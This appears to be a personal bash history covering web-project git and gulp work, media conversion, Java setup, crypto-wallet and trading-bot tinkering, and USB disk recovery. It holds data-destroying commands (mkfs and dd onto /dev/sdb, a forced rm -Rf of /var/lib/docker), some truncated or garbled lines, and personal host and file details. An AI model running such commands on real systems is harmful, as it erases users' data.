'Sorting-options for publications-list-filter' -m 'making radio-groups-filter options available and customizable in module' +git checkout master +git pull +git rebase master general-form-group-radio +git statu +git status +git log +git merge general-form-group-radio --no-ff +git checkout master +git merge general-form-group-radio --no-ff +git pull +git checkout master +git push +git status +git status +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +git status +git add . +git commit -m 'Adding Page: iza-publications-search.html, renaming element-searchfield' -m 'This commit contains many small changes, but mostly the inclusion of the new page. +element-seachfield is now named element-search-tooltip, since it always includes the element-tooltip. +the publications-list-filter is getting more generic and already used here and for the publications-detail. +Still missing is the mobile filter, which can be seen done already for the iza-calender.html.' +git pull +git push +git pull +git status +git add . +#git commit -m '' +gulp watch +npm install +gulp watch +git commit -m 'adding no search results message, if not amountResults' +git pull +git push +git add . +git commit -m 'adding missing, if not amountResults, for mobile view' +git pull +git push +git status +git add . +git commit -m 'adding missing, if not amountResults, for mobile view 2' +git push +git status +git add . +git commit -m 'making variables for element-publication-list to be overwritten form the outside' +git pull +git push +git status +git add . +git commit -m 'adding release-notes for Fellows and Publications' +git pull +git push +git status +git add . +git commit -m 'fixing release-notes-markup' +git pull +git push +git pull +git checkout -b publications-filter-mobile +gulp watc +gulp watch +gulp watch +gulp watch +git status +git add . +git commit -m 'integrating a mobile filter view for fellows and publications' +git status +git checkout master +git pull +git rebase master publications-filter-mobile +git merge publications-filter-mobile --no-ff +git checkout master +git merge publications-filter-mobile --no-ff +gulp watch +git push +gulp watch +git status +git pull +gulp watch +git status +git add . +git commit -m 'removing filter-button from publication-list-filter, since it is included in the parent element' +git push +xbacklight -set 1 +arandr +xbacklight -set 1 +xbacklight -set 1 +Error in plugin 'sass' +Message: + app/modular/sass/base/backgrounds-briq.scss +Error: no mixin named media-breakpoint-up + Backtrace: + app/modular/sass/base/backgrounds-briq.scss:21 +Your branch is up-to-date with 'origin/master'. +[19:35:17] Finished 'watch' after 636 ms[19:35:17] Finished 'watch' after 636 ms +git pull +git checkout briq-header-integration +git status +gulp watch +npm install +gulp watch +gulp watch +gulp watch +gulp watch +[16:32:46] Starting 'nunjucks'... +[16:32:46] Starting 'move'... +[16:32:46] Starting 'nunjucks'... +[16:32:46] Starting 'move'... +[16:33:08] gulp-notify: [DPS Gulp Job | ENV: dev] Task SASS done. +[16:33:08] gulp-notify: [DPS Gulp Job | ENV: dev] Task SASS done. +[16:33:08] gulp-notify: [DPS Gulp Job | ENV: dev] Task SASS done. +[16:33:08] Finished 'sass' after 23 s +[16:33:45] gulp-notify: [DPS Gulp Job | ENV: dev] Task JS done. +[16:33:46] Finished 'js' after 38 s +[16:33:47] Finished 'nunjucks' after 1.02 min +[16:36:15] Starting 'sass'... +[16:33:49] Finished 'watch' after 1.02 s +[16:36:15] Starting 'sass'... +[16:36:25] gulp-notify: [DPS Gulp Job | ENV: dev] Task SASS done. +[16:33:47] Finished 'nunjucks' after 1.02 min +Starting 'sass'... +[16:36:25] gulp-notify: [DPS Gulp Job | ENV: dev] Task SASS done. +[16:33:47] Finished 'nunjucks' after 1.02 min +Starting 'sass'... +[16:36:25] gulp-notify: [DPS Gulp Job | ENV: dev] Task SASS done. +[16:33:47] Finished 'nunjucks' after 1.02 min +gulp watch +gulp watch +gulp watch +gulp watch +ls +cat package.json +ls +yarn add simple-css-tooltips +cat package.json +npm i simple-css-tooltips +ls +ls node_modules/simple-css-tooltips/ +LICENSELICENSEwebpack-dev-server": "^1.15.1" + }, + "dependencies": { + "express": "^4.14.0", + "jquery-mousewheel": "^3.1.13", + "normalize.css": "^5.0.0", + "octicons": "^5.0.1", + "perfect-scrollbar": "^0.6.15", + "jquery-mousewheel": "^3.1.13", + "normalize.css": "^5.0.0", + "react-addons-shallow-compare": "~15.4.1", +"^5.0.1", + "perfect-scrollbar": "^0.6.15", + "react": "^15.3.1", + "react-addons-shallow-compare": "~15.4.1", +react-dom "dependencies": { + "express": "^4.14.0", + "jquery-mousewheel": "^3.1.13", + "normalize.css": "^5.0 "dependencies": { + "jquery-mousewheel": "^3.1.13", +ls +git status +git init +git status +git add . +git status +git commit -m 'Vor moms Text-korrekturen.' +git status +git status +git add . app/modular/sass/components/module-copy-type-14.scss +git commit -m 'we need a proper baseline instead of inconsitant paddings like this' +git status +git add . +git reset --hard HEAD +git reset --hard HEAD +git log +git reset --hard c1639966fe04a2514f24a8f83e8a20ba5b630ace +git status +git status +git add . +git commit -m 'adding background-size to element-background-image.html' +git add . +git commit -m 'we need a proper baseline instead of inconsitant paddings like this' +git add . +git commit -m 'reducing element-background-split.html height to 50px' +git status +git status +git add . +git commit -m 'copying iza-css-card-definitions, needs to be more generic' -m 'using: module-business-card-type-6-fellows element-business-card defintion, used for iza. This ' +git status +git add . +git commit -m 'adjusting page: briq-people.html, reducing module-background-split to 50px (todo: check psd)' +git branch --list +git push -u origin briq-people +git pull +git status +git checkout develop +git pull +git branch --list +git checkout briq-header-integration +git branch --list +git checkout anchor-nav-briq +git checkout anchor-nav-briq +git status +git status +git status +git checkout --app/modular/sass/components/module-anchor-navi-briq.scss +git checkout -- app/modular/sass/components/module-anchor-navi-briq.scss +git status +git checkout briq-header-integration +git status +git . +git add . +git commit -m 'adjusting the Anchor Nav, including a correct bg-color on mobile and hiding the bg on desktop' +git status +git log --stat +git diff +git add . +git commit -m 'adjusting the normal header-height to 510px' +git status +git rebase develop briq-header-integration +git status +git add . +git statu +git status +git rebase --continue +git status +git status +git checkout -- app/modular/sass/components/element-anchor-navigation-briq.scss +git reset app/modular/sass/components/element-anchor-navigation-briq.scss +git status +git checkout -- app/modular/sass/components/element-anchor-navigation-briq.scss +git status +git add . +git status +git rebase --continue +git status +cat .git/rebase-apply/patch +git status +git rebase --abort +git status +git rebase develop briq-header-integration +git status +git add . +git commit -m 'resolving rebase conflicts' +git status +git rebase --continue +git status +git status +git rebase --continue +git rebase --abort +git status +git push +git checkout develop +git pull +git merge briq-header-integration +git status +git status +git add . +git commit -m 'resolving merge conflict' +git status +git pull +git branch --list +git checkout develop +git pull +git checkout -b briq-people +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +ls +ls +sudo cp -R gillette/ pennyDE/ phase3/ /srv/http/ +git pull +git status +git diff +git add . +git commit -m 'adding an extra anchor element for testing' +git push +git pull +git checkout briq-header-integration +git pull +git status +git add app/modular/sass/base/global-briq.scss +git commit -m 'adjusting letter type-2' +git push +git checkout -b briq-about +git status +grep -R 'modules/module-business-card-type-3.html' . +git status +git status +git status +git add . +git commit -m 'setting up the briq about modules' +git status +git checkout develop +git pull +git checkout briq-about +git status +git add . +git status +git commit -m 'adding new briq letters' +git status +git status +git add . +git commit -m 'adjusting modules on home and about' + +git push -u origin briq-about +git status +git add . +git commit -m 'changing briq people to new letters' +git checkout develop +git checkout briq-about +git checkout briq-header-integration +git pull +git rebase briq-header-integration briq-about +git checkout briq-about +git status +git add . +git commit -m 'making sure the mobile header image keeps its minimal width' +git status +git add . +git commit -m 'trying to fix the nav header for the open nav' +git push +git checkout develop +git pull +git rebase develop briq-about +git status +git checkout develop +git merge briq-about --no-ff +git checkout develop +git push +git push +git pull +git checkout briq-header-integration +git checkout develop +git branch -d briq-header-integration +git branch -D briq-header-integration +git checkout briq-header-integration +git pull +git diff +gulp watch +git status +git diff +git status +git add app/modular/pages/briq-calendar.html +git add app/modular/pages/briq-error.html +git commit -m 'events header' +git status +git push +git push +git status +git add app/modular/sass/components/module-header-briq.scss +git commit -m 'changes necessary for calendar and about, needs merging though' +git push +ls /dev +ls /dev +ls /dev +sudo mount sdb1 /mnt/usb/ +ls /dev +sudo mount /dev/sdb1 /mnt/usb/ +sudo umount /mnt/usb/ +ls /dev +ls /dev +tchdog0 +cpu hidraw1 loop1 media0 ppp sda2 tty0 tty18 tty27 tty36 tty45 tty54 tty63 urandom vcs3 vcsa5 zero +cpu_dma_latency hpet loop2 mei0 psaux sda3 tty1 tty19 tty28 tty37 tty46 tty55 tty7 usb vcs4 vcsa6 +(reverse-i-search)`f': git dif^C +[goalador@gatanda dp-s]$ +tchdog0 +cpu hidraw1 loop1 media0 ppp sda2 tty0 tty18 tty27 tty36 tty45 tty54 tty63 urandom vcs3 vcsa5 zero +cpu_dma_latency hpet loop2 mei0 psaux sda3 tty1 tty19 tty28 tty37 tty46 tty55 tty7 usb vcs4 vcsa6 +(reverse-i-search)`f': git dif^C +[goalador@gatanda dp-s]$ +> [goalador@gatanda dp-s]$ +> > [goalador@gatanda dp-s]$ +> > [goalador@gatanda dp-s]$ +> > [goalador@gatanda dp-s]$ +> > > [goalador@gatanda dp-s]$ +> > > [goalador@gatanda dp-s]$ +[goalador@gatanda dp-s]$ cpu_dma_latency hpet loop2 mei0 psaux sda3 tty1 tty19 tty28 tty37 tty46 tty55 tty7 usb vcs4 vcsa6 +bash: cpu_dma_latency: command not found +[goalador@gatanda dp-s]$ (reverse-i-search)`f': git dif^C +f': git dif^C +> [goalador@gatanda dp-s]gatanda dp-autofs disk initctl loop6 network_latency rtc0 stderr tty15 tty25 tty35 tty45 tty55 tty8 vboxdrv vcs7 vhci +block dri input loop7 network_throughput sda stdin tty16 tty26 tty36 tty46 tty56 tty9 vboxdrvu vcsa vhost-net +bsg fb0 kmsg loop-control null sda1 stdout tty17 tty27 tty37 tty47 tty57 ttyS0 vboxnetctl vcsa1 video0 +btrfs-control fd kvm mapper port sda2 tty tty18 tty28 tty38 tty48 tty58 ttyS1 vboxusb vcsa2 watchdog +bus full log mcelog ppp sda3 tty0 tty19 tty29 tty39 tty49 tty59 ttyS2 vcs vcsa3 watchdog0 +char fuse loop0 media0 psaux sda4 tty1 tty2 tty3 tty4 tty5 tty6 ttyS3 vcs1 vcsa4 zero +console disk iio:device0 loop4 memory_bandwidth pts shm tty11 tty20 tty3 tty39 tty48 tty57 tty9 vboxdrv vcs6 vfio +bsg dri initctl loop5 mqueue random snapshot tty12 tty21 tty30 tty4 tty49 tty58 ttyS0 vboxdrvu vcs7 vga_arbiter +btrfs-control fb0 input loop6 net rfkill snd tty13 tty22 tty31 tty40 tty5 tty59 ttyS1 vboxnetctl vcsa vhci +bus fd kmsg loop7 network_latency rtc stderr tty14 tty23 tty32 tty41 tty50 tty6 ttyS2 vboxusb vcsa1 vhost-net +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +gulp watch +bluetoothctl +bluetoothctl +bluetoothctl +git pull +git status +git checkout develop +git pull +git status +git diff +git checkout -- app/modular/templates/modules/module-header-briq.html +git pull +gulp watch +xbacklight -set 1 +bluetoothctl +bluetoothctl +yaourt trading +yaourt ether +yaourt ethereu +yaourt eth +yaourt ether +ls /dev +ls /dev +ls /dev +sudo mount /dev/sdb1 /mnt/usb/ +photorec +ls +ls /dev +ls /dev +fsck /dev/sdb +fdisk /dev/sdb +fdisk /dev/sdb +sudo fdisk /dev/sdb +fsck /dev/sdb +mkfs -t vfat /dev/sdb +fsck /dev/sdb +ls /dev +ls /dev +fsck /dev/sdb +ls /dev +fsck /dev/sdb +fsck /dev/sdb1 +fsck /dev/sdb1 +photorec +photorec +ls /dev +photorec /dev/sdb +photorec /dev/sdb +: +clear +sudo fdisk /dev/sdb +mkfs -t vfat /dev/sdb +mkfs -t vfat /dev/sdb1 +ls /dev +fsck /dev/sdb +ls +ls /dev +fsck /dev/sdb +photorec /dev/sdb +photorec /dev/sdb +photorec /dev/sdb +photorec /dev/sdb +fsck /dev/sdb +photorec /dev/sdb +sudo fdisk /dev/sdb +fsck /dev/sdb +photorec /dev/sdb +ls /dev +ls /dev +ls /dev +photorec /dev/sdb +photorec /dev/sdb1 +ls /dev +fsck /dev/sdb +mkfs -t vfat /dev/sdb +mkfs -t vfat /dev/sdb +mkfs -t vfat /dev/sdb1 +mkfs -t vfat /dev/sdb1 +mkfs -t vfat /dev/sdb +ls /dev +ls /dev +ls /dev +mkfs -t vfat /dev/sdb +ls /dev +df -u /dev/sdb1 +df -h /dev/sdb1 +df -h /dev/sdc1 +ls +du -h +ls +ls wehmuth/ +ls Neos/ +ls +ls wehmuth/ +ls contentflow/ +ls +ls +ls tmp/ +ls +ls backup/ +ls backup/lost+found/ +sudo pcmanfm +yaourt thinker +yaourt thinkerswim +yaourt ether +yaourt thinko +yaourt thinkor +yaourt robin +yaourt trader +yaourt trade +yaourt stock +yaourt stock +killall thunderbird +calc +yaourt ether +yaourt ethere +yaourt mop +mop +mop +go get github.com/mop-tracker/mop +go env +git remote add cjc343 +git pull cjc343 +git merge cjc343/master +make install +mop +ls +ls bin/ +ls +curlsercontent.com/raw/mop-tracker/mop/pull/24.patch |git apply +ls +geany yahoo_quotes.go +geany cnn_market.go +bluetoothctl +yaourt think +yaourt thinko +java -jar launcher.jar +java -jar launcher.jar +java -v +java --version +java +java -version +yaourt java +pacman -R java-7-openjdk +sudo pacman -R java-7-openjdk +sudo pacman -R jre7-openjdk +sudo pacman -R jrk7-openjdk +sudo pacman -R jdk7-openjdk +sudo pacman -R alchemy jdk7-openjdk +sudo pacman -R alchemy jdk7-openjdk +yaourt java +sudo pacman -R jre7-openjdk jre7-openjdk-headless +yaourt java +java +yaourt jre8 +java +java -version +yaourt alchemy +java -jar launcher.jar +CLASSPATH=launcher.jar +export CLASSPATH +java install +yaourt oracle + archlinux-java set java-8-jre/jre +sudo archlinux-java set java-8-jre/jre +java install +java -jar launcher.jar +archlinux-java status +archlinux-java -version +java -version +java -jar launcher.jar +ls +geany thinkorswim.vmoptions +java -jar launcher.jar +java -jar launcher.jar +java -jar launcher.jar +sudo java -jar launcher.jar +java -jar launcher.jar +java -version +java -jar launcher.jar +yaourt stock +stock_quote +jstock +ls +vim suit.properties +java -jar launcher.jar +sudo pacman -R handbrake +sudo pacman -R handbrake-gtk-git +sudo pacman -R handbrake-gtk-git handbrake-cli-git +sudo pacman -R krita +sudo pacman -R atom +sudo pacman -R synfig synfigstudio +sudo pacman -R vagrant +sudo pacman -R vagrant-substrate +sudo pacman -R virtualbox +sudo pacman -R visual-studio-code +sudo pacman -R blender +sudo pacman -R docker +sudo pacman -R docker docker-compose +docker info +ls /var/lib/docker/ +sudo ls /var/lib/docker/ +sudo ls /var/lib/docker/containers +docker ps +sudo systemctl restart docker.service +docker ps +docker images +sudo systemctl stop docker.service +rm -R /var/lib/docker +\rm -R /var/lib/docker +sudo pacman -R docker docker-compose +\rm -Rf /var/lib/docker +sudo rm -Rf /var/lib/docker +sudo pacman -R dunst +yaourt stock +sudo pacman -R jre8-openjdk jre8-openjdk-headless +sudo pacman -R jre8-openjdk jre8-openjdk=8.u144-1 jre8-openjdk-headless +yaourt jre8 + + archlinux-java set java-8-jre/jre8-openjdk +sudo archlinux-java set java-8-jre/jre8-openjdk +archlinux-java status +sudo archlinux-java set jre8-openjdk +sudo archlinux-java set java-openjdk +sudo pacman -R jre8 eclipsetrader jstock +pacman -Q +xbacklight -set 1 +find . -name '*.jpg' | while read f; do convert "$f" -sampling-factor 4:2:0 -strip -interlace Plane -gaussian-blur 0.05 -quality 85% "$f"; echo "Processing file: $f file..."; done +calc +yaourt trder +yaourt trader +eclipsetrder +eclipsetrader +updatedb +sudo updatedb +ls +ls -all +sudo chmod 754 +sudo chmod 754 launcher.jar +ls -all +java -jar launcher.jar +yaourt ninjatr +yaourt trader +yaourt trading + +yaourt trad +yaourt writer +yaourt wallet +yaourt trezor +find . -name 'Reisepass.jpg' | while read f; do convert "$f" -sampling-factor 4:2:0 -strip -interlace Plane -gaussian-blur 0.05 -quality 85% "$f"; echo "Processing file: $f file..."; done +ls /dev +ls /dev +ls /dev +ls /dev +ls /dev +ls /dev +df -h /dev/sdb1 +geth +geth --help +geth account +eth +geth console +gegc +geth account list +geth account new +df -h +ls /backup/ +find . -name 'Passport.jpg' | while read f; do convert "$f" -sampling-factor 4:2:0 -strip -interlace Plane -gaussian-blur 0.05 -quality 85% "$f"; echo "Processing file: $f file..."; done +~/.screenlayout/ulli.sh +lap +~/.screenlayout/laptop.sh +xbacklight -set 1 +yaourt firebase +yaourt firebase +npm install -g firebase-tools +firebase init +ls ~ +ls -all ~ +firebase init +nvm use node +npm install +nvm use node +npm update +node -v +nvm install node +node -v +firebase init +npm install -g firebase-tools +firebase init +firebase login +firebase login +firebase init +firebase serve +npm install firebase-functions@latest --save +firebase serve +firebase deploy --only functions +firebase serve +firebase deploy --only functions +firebase deploy --only functions +node -v +nvm install v6.11.5 +npm install -g firebase-tools +firebase init +firebase serve +ls +ls +git cloneschuchortdev/soundshare +ls +ls +cp google-services.json soundshare/ +ls +git status +ls +mv google-services.json app/ +ls +git statu +git status +git add . +git commit -m 'adding google-services.json for devfest-a6147' +git pull +git push +firebase serve +firebase serve +firebase serve +firebase serve +firebase serve +firebase serve +firebase serve +firebase serve +git pull +git status +git add . +git add . +git status +git add . +git commit -m 'Basic Browser Fileupload' +git pull +git push +firebase serve +firebase serve +midi + +[goalador@gatanda ~]$ + + + + +[goalador@gatanda ~]$ +[goalador@gatanda ~]$ [goalador@gatanda ~]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda ~]$ +[goalador@gatanda ~]$ +[goalador@gatanda ~]$ +ls +convert Website\ Content.pdf Website\ Content.jpg +ls +convert Website\ Content.docx Website\ Content.jpg +convert Website\ Content.docx Website\ Content.jpg -page a4 +convert Website\ Content.docx -page a4 Website\ Content.jpg +ls +convert -density 300 -page a4 Website\ Content.docx Website\ Content.jpg +yaourt torrent +ls +ls +ls bower.json +cat bower.json +bower install --save tachyons +cat bower.json +ls +ls +find . -name '*' | while read f; do convert "$f" -sampling-factor 4:2:0 -strip -interlace Plane -gaussian-blur 0.05 -quality 85% "$f"; echo "Processing file: $f file..."; done +ls -all +ls -hall +find . -name '*.jpg' | while read f; do convert "$f" -sampling-factor 4:2:0 -strip -interlace Plane -gaussian-blur 0.05 -quality 85% "$f"; echo "Processing file: $f file..."; done +ls -hall +find . -name '*.jpg' | while read f; do convert "$f" -geometry 720x -sampling-factor 4:2:0 -strip -interlace Plane -gaussian-blur 0.05 -quality 85% "$f"; echo "Processing file: $f file..."; done +ls -hall +feh alexander-wang-217719.jpg +feh alexander-wang-217719.jpg +find . -name 'noom-peerapong-30948.jpg' | while read f; do convert "$f" -geometry 720x -sampling-factor 4:2:0 -strip -interlace Plane -gaussian-blur 0.05 -quality 85% "$f"; echo "Processing file: $f file..."; done +find . -name 'aziz-acharki-360983.jpg' | while read f; do convert "$f" -geometry 720x -sampling-factor 4:2:0 -strip -interlace Plane -gaussian-blur 0.05 -quality 85% "$f"; echo "Processing file: $f file..."; done +find . -name 'samuel-ferrara-318709.jpg' | while read f; do convert "$f" -geometry 720x -sampling-factor 4:2:0 -strip -interlace Plane -gaussian-blur 0.05 -quality 85% "$f"; echo "Processing file: $f file..."; done +xbacklight +#xbacklight -set 0.18 +xbacklight -set 0.30 +xbacklight -set 0.50 +xbacklight -set 0.8 +xbacklight -set 1 +bluetoothctl +[CHG] Controller C8:F7:33:33:E2:F7 UUIDs: 00001801-0000-1000-8000-00805f9b34fb +calc +ffmpeg.exe -i RCC_High\ Resolution.mp4 -preset veryslow -crf 24 -b:a 512k -c:a aac -strict -2 output.mp4 +ls +ffmpeg.exe -i Showreel.mp4 -preset veryslow -crf 24 -b:a 512k -c:a aac -strict -2 output.mp4 +ffmpeg. -i Showreel.mp4 -preset veryslow -crf 24 -b:a 512k -c:a aac -strict -2 output.mp4 +ffmpeg -i Showreel.mp4 -preset veryslow -crf 24 -b:a 512k -c:a aac -strict -2 output.mp4 +ls -all +ls -hall +mplayer output.mp4 +ffmpeg -i output.mp4 -preset veryslow -crf 25 -b:a 512k -c:a aac -strict -2 output2.mp4 +mplayer output2.mp4 +ls -hall +mplayer output2.mp4 +mplayer output2.mp4 +mplayer Showreel.mp4 +mplayer output2.mp4 +mplayer output2.mp4 +mplayer output2.mp4 +killall redshift +ls +bluetoothctl +bluetoothctl +redshift +redshift& +yaourt kivy +yaourt kivy +xbacklight -set 1 +xbacklight -set 55 +xbacklight -set 5 +yaourt codebox +cat /dev/urandom |tr -dc A-Z9|head -c${1:-81} +yaourt iota +3 +3 +yaourt iota +iota-wallet +iota-wallet +xbacklight -set 1 +yaourt +yaourt open +yaourt --help +password +yaourt password +yaourt password manager +keypass +keepass +yaourt steem +yaourt cli_wallet +~/.screenlayout/ulli.sh +exit +find . -name 'proof_of_*' | while read f; do convert "$f" -geometry 720x -sampling-factor 4:2:0 -strip -interlace Plane -gaussian-blur 0.05 -quality 85% "$f"; echo "Processing file: $f file..."; done +find . -name 'proof_of_*' | while read f; do convert "$f" -geometry 1920x -sampling-factor 4:2:0 -strip -interlace Plane -gaussian-blur 0.05 -quality 85% "$f"; echo "Processing file: $f file..."; done +exit +ls +find . -name '*.jpg' | while read f; do convert "$f" -geometry 1920x -sampling-factor 4:2:0 -strip -interlace Plane -gaussian-blur 0.05 -quality 85% "$f"; echo "Processing file: $f file..."; done +ls +ls videos/ +mogrify -resize 1920x -format jpg *.png +ls +ls -all +ls -hall +find . -name '*.jpg' | while read f; do convert "$f" -geometry 1920x -sampling-factor 4:2:0 -strip -interlace Plane -gaussian-blur 0.05 -quality 85% "$f"; echo "Processing file: $f file..."; done +ls -hall +ls +ls +mogrify -resize 800x -format jpg *.png +ls +find . -name '*.jpg' | while read f; do convert "$f" -geometry 800x -sampling-factor 4:2:0 -strip -interlace Plane -gaussian-blur 0.05 -quality 85% "$f"; echo "Processing file: $f file..."; done +mogrify -resize 800x -format jpg *.png +mogrify -resize 1200x -format jpg *.png +find . -name 'Kickstarter.jpg' | while read f; do convert "$f" -geometry 1200x -quality 85% "$f"; echo "Processing file: $f file..."; done +exit +ssh rius@eltanin.uberspace.de +ls +ffmpeg -i WEHMUTH_FASHION_ADDICT_2017_Teaser_final.mp4 -preset veryslow -crf 25 -b:a 512k -c:a aac -strict -2 Wehmuth_Fashion_Addict_2017_Teaser.ogv +ls -hall +mplayer Wehmuth_Fashion_Addict_2017_Teaser.mp4 +ls +ffmpeg Wehmuth_Fashion_Addict_2017_Teaser.mp4 Wehmuth_Fashion_Addict_2017_Teaser.ogv +ffmpeg -i Wehmuth_Fashion_Addict_2017_Teaser.mp4 Wehmuth_Fashion_Addict_2017_Teaser.ogv +ls +mplayer Wehmuth_Fashion_Addict_2017_Teaser.ogv +ffmpeg -i Wehmuth_Fashion_Addict_2017_Teaser.mp4 -q:v 10 -c:v libtheora -c:a libvorbis Wehmuth_Fashion_Addict_2017_Teaser.ogv +mplayer Wehmuth_Fashion_Addict_2017_Teaser.ogv +ffmpeg -i Wehmuth_Fashion_Addict_2017_Teaser.mp4 -q:v 20 -c:v libtheora -c:a libvorbis Wehmuth_Fashion_Addict_2017_Teaser2.ogv +mplayer Wehmuth_Fashion_Addict_2017_Teaser.ogv +ls -all +ffmpeg -i Wehmuth_Fashion_Addict_2017_Teaser.mp4 -crf 25 -q:v 10 -c:v libtheora -c:a libvorbis Wehmuth_Fashion_Addict_2017_Teaser.ogv +ffmpeg -i Wehmuth_Fashion_Addict_2017_Teaser.mp4 -crf 25 -q:v 10 -c:v libtheora -c:a libvorbis Wehmuth_Fashion_Addict_2017_Teaser3.ogv +ls -hal +ffmpeg -i Wehmuth_Fashion_Addict_2017_Teaser.mp4 -crf 25 -q:v 10 -c:v libvpx -c:a libvorbis Wehmuth_Fashion_Addict_2017_Teaser.webm +ls -hal +mplayer Wehmuth_Fashion_Addict_2017_Teaser.webm +ffmpeg -i Wehmuth_Fashion_Addict_2017_Teaser.mp4 -acodec libvorbis -aq 5 -ac 2 -qmax 25 -threads 2 libvorbis Wehmuth_Fashion_Addict_2017_Teaser.webm +ffmpeg -i Wehmuth_Fashion_Addict_2017_Teaser.mp4 -codec:a libvorbis -aq 5 -ac 2 -qmax 25 -threads 2 libvorbis Wehmuth_Fashion_Addict_2017_Teaser.webm +ffmpeg -i Wehmuth_Fashion_Addict_2017_Teaser.mp4 -acodec libvorbis -aq 5 -ac 2 -qmax 25 -threads 2 Wehmuth_Fashion_Addict_2017_Teaser.webm +ls -hal +mplayer Wehmuth_Fashion_Addict_2017_Teaser.webm +ffmpeg -i Wehmuth_Fashion_Addict_2017_Teaser.mp4 -vcodec libtheora -q:v 10 -codec:a libvorbis -q:a 5 -vsync 2 -threads 0 Wehmuth_Fashion_Addict_2017_Teaser4.ogv +ls -hal +mplayer Wehmuth_Fashion_Addict_2017_Teaser.ogv +ls +convert -quality 85 -format jpg *.png +ls +convert -format jpg *.png +morgify -quality 85 -format jpg *.png +mogrify -quality 85 -format jpg *.png +ls +ls -hal +ls +ls +history +history +ls +ffmpeg -i Showreel.mp4 -vcodec libtheora -q:v 10 -codec:a libvorbis -q:a 5 -vsync 2 -threads 0 Showreel.ogv +ffmpeg -i Showreel.mp4 -acodec libvorbis -aq 5 -ac 2 -qmax 25 -threads 2 Showreel.webm +ffmpeg -i Showreel.mp4 -acodec libvorbis -aq 5 -ac 2 -qmax 25 -threads 2 Showreel.webm +ls +ssh rius@eltanin.uberspace.de +~/.screenlayout/laptop.sh +yaourt vertcoin +yaourt vertcoin +yaourt vertcoin +electrum-vtc +yaourt cordano +yaourt cardano +yaourt verge +~/.screenlayout/ulli.sh +killall geany +ls +ls +cat config/ +cat config/database.php +ls +ls resources/ +ls vendor/ +cat vendor/autoload.php +ls +ls app/ +cat app/Setting.php +#lpr -o fit-to-page -o media=A4 -P 6500-E709a Rechnung_Maerz_Interone_OneWeb_18-04-2017.pdf +lpr --list +lpr -list +bower install --save scrollspy +ls +ls +ls +mogrify -quality 85 -format jpg 01_Anja-incl-font.png +mogrify -resize 800x 01_Anja-no-font-800.png +mogrify -resize 128x 01_Anja-no-font_small.png +mogrify -resize 400x 01_Anja-no-font_400.png +mogrify -resize 400x 01_Anja-no-font-400.png +mogrify -resize 128x 01_Anja-incl-font-128.png +mogrify -resize 32x BlueOracleFilmsFavIcon.png +convert -geometry 800x -i 01_Anja-alleine.jpg +convert -geometry 800x 01_Anja-alleine.jpg +convert 01_Anja-alleine.jpg -geometry 800x +find . -name '01_Anja-alleine.jpg' | while read f; do convert "$f" -geometry 800x -quality 85% "$f"; echo "Processing file: $f file..."; done +mogrify -resize 128x 01_Anja-no-font-box-128.png +exit +touch useful-cmds +echo 'lsblk #show available drives including usb and their partitions' >> useful-cmds +ls useful-cmds +cat useful-cmds +~/.screenlayout/laptop.sh +killall geany +killall geany +killall geany +killall geany +killall geany +killall geany +yaourt electrum +ls +cp -R BlueOracleFilms/ BlueOracleFilms_Bak_11-12-2017 +ls +ls +ls +s +ls +mogrify -quality 85 -format jpg *.png +ls -all +ls -hal +mogrify -quality 80 -format jpg *.png +ls -hal +find . -name '*.jpg' | while read f; do convert "$f" -sampling-factor 4:2:0 -strip -interlace Plane -gaussian-blur 0.05 -quality 85% "$f"; echo "Processing file: $f file..."; done +ls -hal +find . -name 'Kickstarter.jpg' | while read f; do convert "$f" -geometry 1920x -quality 85% "$f"; echo "Processing file: $f file..."; done +ls -hal +find . -name 'Platzhalter Showreel.jpg' | while read f; do convert "$f" -geometry 1920x -quality 85% "$f"; echo "Processing file: $f file..."; done +ls -hal +mv Platzhalter\ Showreel.jpg Platzhalter_Showreel.jpg +ls -hal +find . -name 'setion-team_ignacio-campo-339907.jpg' | while read f; do convert "$f" -geometry 1920x -quality 85% "$f"; echo "Processing file: $f file..."; done +ls -hal +ls -hal +gpg --keyserver-options auto-key-retrieve --verify archlinux--x86_64.iso.sig +ls +gpg --keyserver-options auto-key-retrieve --verify archlinux-2017.12.01-x86_64.iso.sig +s/lookup?op=vindex&fingerprint=on&exact=on&search=0x4AA4767BBC9C4B1D18AE28B77F2D434B9741E8AC +lsblk +dd bs=4M if=archlinux-2017.12.01-x86_64.iso of=/dev/sdb status=progress && sync +echo 'dd bs=4M if=archlinux-2017.12.01-x86_64.iso of=/dev/sdb status=progress && sync' >> ~/useful-cmds +cat ~/useful-cmds +echo 'Warning: This will irrevocably destroy all data on /dev/sdx. To restore the USB drive as an empty, usable storage device after using the Arch ISO image, the iso9660 filesystem signature needs to be removed by running wipefs --all /dev/sdx as root, before repartitioning and reformating the USB drive.' >> ~/useful-cmds +yaourt timeshift +timeshift +yaourt timeshift +timeshift-gtk +su timeshift-gtk +sudo timeshift-gtk +cat useful-cmds +lsblk +fdisk /dev/sdb +fdisk /dev/sdb +mkfs +man mkfs +mkfs -t ext4 /dev/sdb1 +mkfs -t ext4 /dev/sdb1 +linuxTimeshift +mkfs -t vfat /dev/sdb2 +ls /dev/sdb +sudo fdisk /dev/sdb +sudo fdisk /dev/sdb +sudo fdisk /dev/sdb +mkfs -t ext4 /dev/sdb1 +mkfs -t vfat /dev/sdb2 +sudo timeshift-gtk +git status +vim /etc/udev/rules.d/20-hw1.rules +sudo vim /etc/udev/rules.d/20-hw1.rules +ls +git init +git status +vim .gitignore +git add .gitignore +git status +git add . +git status +git commit -m 'initial commit' +yaourt verge +yaourt electru +vim /etc/httpd/conf/extra/httpd-vhosts.conf +git status +git add . +git commit -m 'update todos' +yaourt trading bot +yaourt trading bot +sudo pacman -Syu +sudo pacman -Syu +ls +mkdir Bots +git clonese/gdax-tt +git clonesher-/gocryptotrader +git clone +git clonesaniales/golang-crypto-trading-bot +git clones/optimal-buy-gdax +git clone +ls +geany routines.go +ech $GOPATH +echo $GOPATH +go +echo $gopth +echo $gopath +ls +ls +ls scripts/ +ls +geany main.py +xbacklight -set 1 +ls +lpr -o fit-to-page -o media=A4 -o ColorModel=KGray -P 6500-E709a boarding-pass.pdf +lpr -o fit-to-page -o media=A4 -o ColorModel=KGray -P /home/goalador/webentwicklung/webappcreations/Firma/Finanzen/Krankkenkasse/Zfa-schreiben.pdf +lpr -o fit-to-page -o media=A4 -o ColorModel=KGray -P 